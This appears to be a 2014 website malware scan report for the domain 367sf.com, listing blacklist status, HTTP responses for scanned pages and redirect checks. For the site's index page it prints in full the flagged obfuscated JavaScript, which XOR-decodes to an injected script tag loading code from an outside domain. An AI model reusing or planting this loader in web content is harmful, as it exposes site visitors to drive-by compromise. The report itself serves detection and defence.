Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=367sf.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://367sf.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.367sf.com/ | HTTP/1.1 200 OK Date: Mon, 12 May 2014 16:23:17 GMT Accept-Ranges: bytes ETag: "b8722349ca6dcf1:1f2" Server: Microsoft-IIS/6.0 Content-Length: 45642 Content-Location: http://www.367sf.com/index.htm Content-Type: text/html Last-Modified: Mon, 12 May 2014 10:09:39 GMT | clean |
http://www.367sf.com/index.htm | 200 OK Content-Length: 45642 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var J=function(m){return String.fromCharCode(m^33)};eval(J(69)+J(78)+J(66)+J(84)+J(76)+J(68)+J(79)+J(85)+J(15)+J(86)+J(83)+J(72)+J(85)+J(68)+J(77)+J(79)+J(9)+J(3)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(29)+J(14)+J(85)+J(83)+J(31)+J(3)+J(8)+J(26)+J(43)+J(69)+J(78)+J(66)+J(84)+J(76)+J(68)+J(79)+J(85)+J(15)+J(86)+J(83)+J(72)+J(85)+J(68)+J(77)+J(79)+J(9)+J(3)+J(29)+J(82)+J(66)+J(83)+J(72)+J(81)+J(85)+J(1)+J(82)+J(83)+J(66)+J(28)+J(125)+J(3)+J(73)+J(85)+J(85)+J(81)+J(27)+J(14)+J(14)+J(86)+J(86)+J(86)+J(15)+J(76)+J(67)+J(19)+J(19)+J(25)+J(15)+J(66)+J(78)+J(76)+J(14)+J(75)+J(82)+J(15)+J(75)+J(82)+J(125)+J(3)+J(31)+J(29)+J(14)+J(82)+J(66)+J(83)+J(72)+J(81)+J(85)+J(31)+J(3)+J(8)+J(26)+J(43)+J(69)+J(78)+J(66)+J(84)+J(76)+J(68)+J(79)+J(85)+J(15)+J(86)+J(83)+J(72)+J(85)+J(68)+J(77)+J(79)+J(9)+J(3)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(1)+J(29)+J(85)+J(83)+J(31)+J(3)+J(8)+J(26)+''); Antivirus reports:
| ||
http://www.367sf.com/ÓùÁú¾ÅÌì.rar | 200 OK Content-Length: 300704 Content-Type: application/octet-stream | clean |
http://www.367sf.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 367sf.com
Result:
GET / HTTP/1.1
Host: 367sf.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 367sf.com
Referer: http://www.google.com/search?q=367sf.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 367sf.com
Referer: http://www.google.com/search?q=367sf.com
Result:
The result is similar to the first query. There are no suspicious redirects found.